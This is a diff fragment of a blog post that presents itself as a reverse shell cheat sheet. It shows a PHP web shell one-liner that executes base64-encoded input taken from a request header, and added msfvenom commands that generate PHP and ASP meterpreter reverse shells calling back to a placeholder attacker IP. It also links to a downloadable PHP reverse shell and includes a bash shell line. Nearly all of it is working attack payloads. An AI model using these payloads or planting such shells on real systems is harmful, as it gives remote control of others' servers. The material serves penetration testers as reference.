Arr0way/arr0way.github.io/_posts/2015-3-29-reverse-shell-cheat-sheet.md

 <?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
 ```

+### MSFVenom PHP Reverse Shell

+MSFVenom can be used to generate a PHP revsell using the following command:

+{% highlight bash %}
+msfvenom -p php/meterpreter_reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.php
+{% endhighlight %}

 Another excellent PHP shell that I have personally used MANY times is the Pentest Monkey reverse shell that can be downloaded from their GitHub here: [https://github.com/pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell)

+## ASP Reverse Shell

+MSFVenom can be leveraged to generate an ASP reverse shell.

+How to generate an ASP Reverse Shell with MSFVenom:

+{% highlight bash %}
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f asp > rev-shell.asp
+{% endhighlight %}

 ## Bash Reverse Shells

 {% highlight bash %}
 exec /bin/bash 0&0 2>&0
 {% endhighlight %}